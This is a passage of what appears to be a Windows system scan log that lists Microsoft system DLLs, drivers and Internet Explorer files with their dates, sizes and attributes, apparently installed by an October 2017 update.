2017-10-10 20:23 - 2017-09-13 16:28 - 000316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000118784 _____ (Microsoft Corporation) C:\Windows\system32\wlanhlp.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\wlanapi.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 001460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 001163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000731648 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:27 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:13 - 004001512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2017-10-10 20:23 - 2017-09-13 16:13 - 003945704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2017-10-10 20:23 - 2017-09-13 16:10 - 001314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 001114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000830464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000428032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanmsm.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000392704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlansec.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000083968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanhlp.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanapi.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2017-10-10 20:23 - 2017-09-13 16:09 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000554496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:08 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 16:05 - 000324608 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\nwifi.sys
2017-10-10 20:23 - 2017-09-13 16:00 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2017-10-10 20:23 - 2017-09-13 16:00 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2017-10-10 20:23 - 2017-09-13 16:00 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2017-10-10 20:23 - 2017-09-13 16:00 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2017-10-10 20:23 - 2017-09-13 15:57 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2017-10-10 20:23 - 2017-09-13 15:56 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2017-10-10 20:23 - 2017-09-13 15:53 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-10-10 20:23 - 2017-09-13 15:53 - 000159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-10-10 20:23 - 2017-09-13 15:53 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-10-10 20:23 - 2017-09-13 15:52 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2017-10-10 20:23 - 2017-09-13 15:52 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2017-10-10 20:23 - 2017-09-13 15:50 - 000050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2017-10-10 20:23 - 2017-09-13 15:47 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2017-10-10 20:23 - 2017-09-13 15:46 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2017-10-10 20:23 - 2017-09-13 15:46 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2017-10-10 20:23 - 2017-09-13 15:46 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2017-10-10 20:23 - 2017-09-13 15:46 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 15:46 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 15:46 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 15:46 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2017-10-10 20:23 - 2017-09-13 15:46 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2017-10-10 20:23 - 2017-09-09 01:45 - 000395984 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-10-10 20:23 - 2017-09-09 00:47 - 000347344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-10-10 20:23 - 2017-09-08 16:34 - 001680616 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2017-10-10 20:23 - 2017-09-08 16:30 - 002319872 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 002222080 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 002058240 _____ (Microsoft Corporation) C:\Windows\system32\Query.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000778240 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000491520 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000288256 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000149504 _____ (Microsoft Corporation) C:\Windows\system32\t2embed.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000115200 _____ (Microsoft Corporation) C:\Windows\system32\mssitlb.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000099840 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\msscntrs.dll
2017-10-10 20:23 - 2017-09-08 16:30 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\msshooks.dll
2017-10-10 20:23 - 2017-09-08 16:14 - 000591872 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2017-10-10 20:23 - 2017-09-08 16:13 - 000249856 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2017-10-10 20:23 - 2017-09-08 16:13 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\SearchFilterHost.exe
2017-10-10 20:23 - 2017-09-08 16:10 - 001549824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2017-10-10 20:23 - 2017-09-08 16:10 - 001363968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Query.dll
2017-10-10 20:23 - 2017-09-08 16:10 - 000312832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-10-10 20:23 - 2017-09-08 16:10 - 000109568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\t2embed.dll
2017-10-10 20:23 - 2017-09-08 16:09 - 001400320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2017-10-10 20:23 - 2017-09-08 16:09 - 000666624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2017-10-10 20:23 - 2017-09-08 16:09 - 000337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2017-10-10 20:23 - 2017-09-08 16:09 - 000197120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssphtb.dll
2017-10-10 20:23 - 2017-09-08 16:09 - 000104448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssitlb.dll
2017-10-10 20:23 - 2017-09-08 16:09 - 000059392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscntrs.dll
2017-10-10 20:23 - 2017-09-08 16:09 - 000034816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssprxy.dll
2017-10-10 20:23 - 2017-09-08 16:00 - 003222016 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-10-10 20:23 - 2017-09-08 16:00 - 000427520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2017-10-10 20:23 - 2017-09-08 16:00 - 000164352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2017-10-10 20:23 - 2017-09-08 15:59 - 000086528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchFilterHost.exe
2017-10-10 20:23 - 2017-09-08 15:59 - 000009728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msshooks.dll
2017-10-10 20:23 - 2017-09-08 15:20 - 000640512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mswstr10.dll
2017-10-10 20:23 - 2017-09-08 15:20 - 000345088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msexcl40.dll
2017-10-10 20:23 - 2017-09-08 15:20 - 000008704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msjint40.dll
2017-10-10 20:23 - 2017-09-07 22:38 - 002724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-10-10 20:23 - 2017-09-07 22:37 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-10-10 20:23 - 2017-09-07 22:19 - 000066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-10-10 20:23 - 2017-09-07 22:18 - 000417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-10-10 20:23 - 2017-09-07 22:18 - 000048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-10-10 20:23 - 2017-09-07 22:17 - 000576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-10-10 20:23 - 2017-09-07 22:17 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-10-10 20:23 - 2017-09-07 22:15 - 002902528 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-10-10 20:23 - 2017-09-07 22:08 - 025729536 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-10-10 20:23 - 2017-09-07 22:08 - 000054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-10-10 20:23 - 2017-09-07 22:07 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-10-10 20:23 - 2017-09-07 22:02 - 000615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-10-10 20:23 - 2017-09-07 22:01 - 000814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-10-10 20:23 - 2017-09-07 22:01 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-10-10 20:23 - 2017-09-07 22:01 - 000116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-10-10 20:23 - 2017-09-07 22:00 - 000817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-10-10 20:23 - 2017-09-07 21:52 - 000968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-10-10 20:23 - 2017-09-07 21:48 - 000489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-10-10 20:23 - 2017-09-07 21:40 - 005982208 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-10-10 20:23 - 2017-09-07 21:39 - 000077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-10-10 20:23 - 2017-09-07 21:38 - 000087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-10-10 20:23 - 2017-09-07 21:37 - 000107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-10-10 20:23 - 2017-09-07 21:33 - 000199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-10-10 20:23 - 2017-09-07 21:32 - 000092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-10-10 20:23 - 2017-09-07 21:29 - 000315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-10-10 20:23 - 2017-09-07 21:27 - 000152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-10-10 20:23 - 2017-09-07 21:13 - 000262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-10-10 20:23 - 2017-09-07 21:10 - 000807936 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-10-10 20:23 - 2017-09-07 21:10 - 000726528 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-10-10 20:23 - 2017-09-07 21:08 - 002134528 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-10-10 20:23 - 2017-09-07 21:08 - 001359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-10-10 20:23 - 2017-09-07 20:44 - 015262720 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-10-10 20:23 - 2017-09-07 20:40 - 003240960 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-10-10 20:23 - 2017-09-07 20:27 - 002724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2017-10-10 20:23 - 2017-09-07 20:27 - 001548288 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-10-10 20:23 - 2017-09-07 20:17 - 000800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-10-10 20:23 - 2017-09-07 20:11 - 000062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2017-10-10 20:23 - 2017-09-07 20:10 - 000499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-10-10 20:23 - 2017-09-07 20:10 - 000341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2017-10-10 20:23 - 2017-09-07 20:10 - 000047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2017-10-10 20:23 - 2017-09-07 20:09 - 000064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-10-10 20:23 - 2017-09-07 20:04 - 020267008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-10-10 20:23 - 2017-09-07 20:03 - 002292736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-10-10 20:23 - 2017-09-07 20:03 - 000047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2017-10-10 20:23 - 2017-09-07 20:02 - 000030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
